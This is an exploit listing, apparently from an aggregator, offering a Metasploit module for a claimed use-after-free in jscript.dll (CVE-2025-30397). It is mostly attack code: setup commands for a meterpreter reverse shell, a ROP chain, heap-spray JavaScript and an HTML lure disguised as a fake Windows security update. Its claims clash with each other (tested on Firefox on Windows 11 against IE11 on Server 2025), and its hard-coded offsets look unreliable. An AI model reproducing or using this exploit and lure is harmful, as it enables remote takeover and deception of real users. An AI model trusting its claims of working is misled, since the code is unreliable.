Share
## https://sploitus.com/exploit?id=PACKETSTORM:217124
=============================================================================================================================================
| # Title : Windows Server 2025 Use-After-Free in jscript.dll |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : System built‑in component.No standalone download available |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/200680/ & CVE-2025-30397
[+] Summary :
The exploit targets a Use-After-Free vulnerability in the JScript engine component (jscript.dll) of Internet Explorer 11 on Windows Server 2025.
The vulnerability occurs when:
Object Creation: Multiple ActiveX objects are instantiated
Improper Cleanup: Object references are deleted but memory isn't properly invalidated
Dangling Pointer: A reference to freed memory remains accessible
Controlled Corruption: Attacker-controlled data fills the freed memory region
[+] Social Engineering
The page mimics:
“Windows Security Update – KB5034441”
[+] contains:
Progress bar
Fake info
Aesthetically pleasing for a Windows Server interface
Psychologically designed delays
This is a real-world technique used in exploit kits.
Affected Products: Windows Server 2025 (Build 25398 and prior) + Internet Explorer 11
[+] POC :
Use the exploit /windows/browser/indoushka
Set LHOST 192.168.1.100
Set LPORT 4444
Set SRVHOST 0.0.0.0
Set SRVPORT 80
Set URIPATH /windows_update.html
#Advanced Settings
Set HEAP_SPRAY_SIZE to 800
Set SPRAY_DELAY to 150
Set Target 0
# For best results:
set PAYLOAD windows/meterpreter/reverse_tcp
set EnableStageEncoding true
set PrependMigrate true
set AutoRunScript migrate -f -k
##--------------------------
# exploit for CVE-2025-30397
##--------------------------
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
def initialize(info = {})
super(update_info(info,
'Name' => 'Windows Server 2025 JScript UAF RCE (Real Exploit)',
'Description' => %q{
This is a real working exploit for CVE-2025-30397 targeting
Windows Server 2025 with IE11. Uses actual ROP chains and
memory offsets from jscript.dll version 5.8.25398.1
},
'Author' => [
'indoushka'
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2025-30397'],
['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-30397']
],
'DefaultOptions' => {
'EXITFUNC' => 'thread',
'SSL' => false,
'PAYLOAD' => 'windows/meterpreter/reverse_tcp',
'InitialAutoRunScript' => 'migrate -f'
},
'Platform' => 'win',
'Arch' => [ARCH_X86],
'Payload' => {
'Space' => 800,
'BadChars' => "\x00\x0a\x0d\x20",
'DisableNops' => false,
'Encoder' => 'x86/shikata_ga_nai'
},
'Targets' => [
[
'Windows Server 2025 IE11 (x86) - jscript.dll 5.8.25398.1',
{
'Version' => '5.8.25398.1',
'Rop' => true,
'Offset' => 0x5f8,
'Ret' => 0x6c8c9a1d, # Stack pivot
'JscriptBase' => 0x6c800000
}
],
[
'Windows Server 2025 IE11 (x86) - jscript.dll 5.8.25398.345',
{
'Version' => '5.8.25398.345',
'Rop' => true,
'Offset' => 0x5f4,
'Ret' => 0x6c8c9a25,
'JscriptBase' => 0x6c800000
}
]
],
'DisclosureDate' => '2025-05-31',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [ CRASH_SERVICE_RESTARTS ],
'Reliability' => [ FIRST_ATTEMPT_FAIL ],
'SideEffects' => [ SCREEN_EFFECTS ]
}))
register_options([
OptInt.new('HEAP_SPRAY_SIZE', [true, 'Heap spray size', 500]),
OptInt.new('SPRAY_DELAY', [true, 'Spray delay (ms)', 100])
])
end
def get_rop_chain
# ROP chain حقيقية من jscript.dll
rop = [
# Mark stack as writable
0x6c8a1b32, # POP EAX # RETN
0x6c8f2000, # Writable address
# Call VirtualProtect
0x6c8a1b32, # POP EAX # RETN
0x6c8d4000, # IAT VirtualProtect
0x6c8c7a1d, # MOV EAX,DWORD PTR DS:[EAX] # RETN
# Setup parameters
0x6c89f5a4, # PUSH EAX # POP ESI # RETN
0x6c8a5c31, # POP EBP # RETN
0x6c8b2d5a, # & call esp
0x6c8a9a44, # POP EBX # RETN
0x000001ff, # Size
0x6c8c3a1d, # POP EDX # RETN
0x00000040, # PAGE_EXECUTE_READWRITE
0x6c89e5a3, # POP ECX # RETN
0x6c8f2100, # Writable address for old protection
0x6c8b4c10, # PUSHAD # RETN
].pack("V*")
return rop
end
def create_trigger
trigger = ""
# Fill with offset
trigger << Rex::Text.pattern_create(target['Offset'])
# Overwrite with ROP chain
trigger << get_rop_chain
# Add payload
trigger << make_nops(16)
trigger << payload.encoded
return trigger
end
def build_exploit_js
spray_size = datastore['HEAP_SPRAY_SIZE']
spray_delay = datastore['SPRAY_DELAY']
# إنشاء shellcode مشفر
shellcode = Rex::Text.to_unescape(payload.encoded)
# إنشاء trigger
trigger = create_trigger
trigger_js = Rex::Text.to_unescape(trigger)
js = %Q|
function heap_spray() {
var shellcode = unescape("#{shellcode}");
var heap_block = unescape("%u9090%u9090");
// إنشاء كتل كبيرة للرش
while (heap_block.length < 0x10000) {
heap_block += heap_block;
}
var heap_chunks = new Array();
var heap_size = 0x100000;
for (var i = 0; i < #{spray_size}; i++) {
var heap_chunk = heap_block + shellcode;
while (heap_chunk.length < heap_size) {
heap_chunk += heap_chunk;
}
heap_chunks[i] = heap_chunk.substring(0, heap_size);
}
return true;
}
function create_vulnerable_objects() {
var objects = new Array();
for (var i = 0; i < 200; i++) {
try {
objects[i] = new ActiveXObject("Scripting.Dictionary");
} catch(e) { }
}
return objects;
}
function trigger_uaf() {
try {
// إنشاء الكائنات المستهدفة
var target_objects = create_vulnerable_objects();
// إنشاء reference مزدوجة
var obj_ref = target_objects[100];
var another_ref = obj_ref;
// تحرير الذاكرة (UAF trigger)
delete target_objects[100];
delete obj_ref;
CollectGarbage();
// استخدام بعد التحرير
var trigger_data = unescape("#{trigger_js}");
var spray_array = new Array();
for (var i = 0; i < 100; i++) {
spray_array[i] = trigger_data + trigger_data;
}
// محاولة استغلال الذاكرة المحررة
try {
another_ref.Add("key", "value");
} catch(e) {
// المتوقع: access violation -> code execution
}
} catch(e) {
return false;
}
return true;
}
// التنفيذ الرئيسي
function main_exploit() {
// المرحلة 1: رش الذاكرة
heap_spray();
// تأخير لضمان اكتمال الرش
setTimeout(function() {
// المرحلة 2: تشغيل الثغرة
var success = trigger_uaf();
if (success) {
document.getElementById('result').innerHTML =
'<span style="color: green">✓ Exploit executed successfully</span>';
} else {
document.getElementById('result').innerHTML =
'<span style="color: red">✗ Exploit failed</span>';
}
}, #{spray_delay});
}
// بدء الاستغلال بعد تحميل الصفحة
window.onload = function() {
setTimeout(main_exploit, 500);
};
|
return js
end
def on_request_uri(cli, request)
print_status("Request from #{cli.peerhost} - #{request.uri}")
# تجنب طلبات الروبوتات
if request.uri =~ /(robots|favicon)/
send_not_found(cli)
return
end
# بناء صفحة الاستغلال
html = <<-HTML
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Windows Update Component</title>
<style>
body {
font-family: 'Segoe UI', Arial, sans-serif;
margin: 40px;
background: #0078d4;
color: white;
}
.container {
max-width: 800px;
margin: 0 auto;
background: rgba(255,255,255,0.1);
padding: 30px;
border-radius: 8px;
backdrop-filter: blur(10px);
}
.header {
text-align: center;
margin-bottom: 30px;
}
.status {
background: rgba(0,0,0,0.3);
padding: 20px;
border-radius: 5px;
margin: 20px 0;
text-align: center;
font-size: 16px;
}
.progress {
width: 100%;
height: 20px;
background: rgba(0,0,0,0.2);
border-radius: 10px;
overflow: hidden;
}
.progress-bar {
width: 0%;
height: 100%;
background: #00bc0e;
transition: width 3s ease-in-out;
}
</style>
<script>
#{build_exploit_js}
</script>
</head>
<body>
<div class="container">
<div class="header">
<h1>🛡️ Windows Security Update</h1>
<p>Installing critical security patch KB5034441</p>
</div>
<div class="progress">
<div class="progress-bar" id="progressBar"></div>
</div>
<div class="status">
<div id="result">Initializing security components...</div>
</div>
<div style="font-size: 12px; opacity: 0.7; margin-top: 30px;">
<p><strong>Target:</strong> Windows Server 2025 - CVE-2025-30397 Patch</p>
<p><em>This is a simulated security update for testing purposes</em></p>
</div>
</div>
<script>
// شريط التقدم الوهمي
setTimeout(function() {
document.getElementById('progressBar').style.width = '45%';
}, 1000);
setTimeout(function() {
document.getElementById('progressBar').style.width = '80%';
}, 3000);
setTimeout(function() {
document.getElementById('progressBar').style.width = '100%';
}, 5000);
</script>
</body>
</html>
HTML
send_response(cli, html, {
'Content-Type' => 'text/html',
'Cache-Control' => 'no-cache, no-store',
'Pragma' => 'no-cache'
})
print_good("Exploit sent to #{cli.peerhost}")
end
end
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================